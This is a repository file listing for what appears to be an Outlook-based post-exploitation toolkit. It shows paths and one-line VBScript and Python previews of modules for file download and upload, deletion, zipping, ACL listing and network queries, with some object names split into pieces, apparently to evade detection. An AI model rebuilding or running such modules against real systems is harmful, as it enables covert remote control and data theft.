"path": "functions/operation/file/create_shortcut.txt",
"chars": 552,
"preview": "Function create_shortcut()\r\n On error resume next\r\n Set objShell = window.external.OutlookApplication.CreateObject"
},
{
"path": "functions/operation/file/delete_dir.py",
"chars": 850,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/operation/file/delete_dir.txt",
"chars": 551,
"preview": "Function delete_dir()\n On error resume next\n Set fs = window.external.OutlookApplication.CreateObject(\"Scripting.F"
},
{
"path": "functions/operation/file/delete_file.py",
"chars": 699,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/operation/file/delete_file.txt",
"chars": 436,
"preview": "Function delete_file()\r\n\tOn error resume next\r\n\tSet fs = window.external.OutlookApplication.CreateObject(\"Scripting.File"
},
{
"path": "functions/operation/file/download_filehttp.py",
"chars": 1353,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/operation/file/download_filehttp.txt",
"chars": 694,
"preview": "Function download_filehttp()\r\n\tOn error resume next\r\n\tSet oHTTP = window.external.OutlookApplication.CreateObject(\"MSX\" "
},
{
"path": "functions/operation/file/get_file.py",
"chars": 3722,
"preview": "import math\nimport copy\nimport traceback\nfrom lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import "
},
{
"path": "functions/operation/file/get_file.txt",
"chars": 242,
"preview": "Function get_file()\r\n\tOn Error Resume Next\r\n\tSet fs = window.external.OutlookApplication.CreateObject(\"Scripting.FileSys"
},
{
"path": "functions/operation/file/list_acl.py",
"chars": 827,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/operation/file/list_acl.txt",
"chars": 3495,
"preview": "Function list_acl()\n ' ACE Types\n\tConst ACCESS_ALLOWED_ACE_TYPE = &h0\n\tConst ACCESS_DENIED_ACE_TYPE = &h1\n\n\t' Base A"
},
{
"path": "functions/operation/file/list_dir.py",
"chars": 4870,
"preview": "from lib.core.specmodule import SpecModule\r\nfrom lib.modhandlers.generic import quotedstring,makebool,makeint\r\nfrom lib."
},
{
"path": "functions/operation/file/list_dir.txt",
"chars": 204,
"preview": "Function list_dir()\r\n\tOn error resume next\r\n list_dir = dir_lister({{directory}}, {{depth}}, {{recurselevels}}, {{fil"
},
{
"path": "functions/operation/file/list_shortcutinfo.py",
"chars": 671,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\nclass Spec(SpecModule):\n "
},
{
"path": "functions/operation/file/list_shortcutinfo.txt",
"chars": 965,
"preview": "Function list_shortcutinfo()\r\n On error resume next\r\n Set objShell = window.external.OutlookApplication.CreateObje"
},
{
"path": "functions/operation/file/move_file.py",
"chars": 972,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/operation/file/move_file.txt",
"chars": 391,
"preview": "Function move_file()\n On error resume next\n Set fs = window.external.OutlookApplication.CreateObject(\"Scripting.Fi"
},
{
"path": "functions/operation/file/put_file.py",
"chars": 5372,
"preview": "import math\nimport copy\nimport os\nimport traceback\nfrom lib.core.specmodule import SpecModule\nfrom lib.modhandlers.gener"
},
{
"path": "functions/operation/file/put_file.txt",
"chars": 187,
"preview": "Function put_file()\n\tSet fso = window.external.OutlookApplication.CreateObject(\"Scripting.FileSystemObject\")\n\tSet File ="
},
{
"path": "functions/operation/file/split_file.py",
"chars": 2088,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring,makeint\nfrom lib.validators."
},
{
"path": "functions/operation/file/split_file.txt",
"chars": 2066,
"preview": "Function split_file()\r\n\ton error resume next\r\n\tSet oFSO = window.external.OutlookApplication.CreateObject(\"Scripting.Fil"
},
{
"path": "functions/operation/file/zip_content.py",
"chars": 1436,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/operation/file/zip_content.txt",
"chars": 2960,
"preview": "Function zip_content()\n\ton error resume next\n\tSet oFSO = window.external.OutlookApplication.CreateObject(\"Scrip\" & \"ting"
},
{
"path": "functions/operation/network/netstat.py",
"chars": 667,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/operation/network/netstat.txt",
"chars": 746,
"preview": "function netstat()\n on error resume next\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemScrip"
},
{
"path": "functions/operation/network/nslookup.py",
"chars": 909,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/operation/network/nslookup.txt",
"chars": 568,
"preview": "function nslookup()\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemScripting.SWbemLocator\")\n "
},
{
"path": "functions/operation/outlook/adjust_notifications.py",
"chars": 2246,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring,makebool\nfrom lib.validators"
}
]
// ... and 112 more files (download for full content)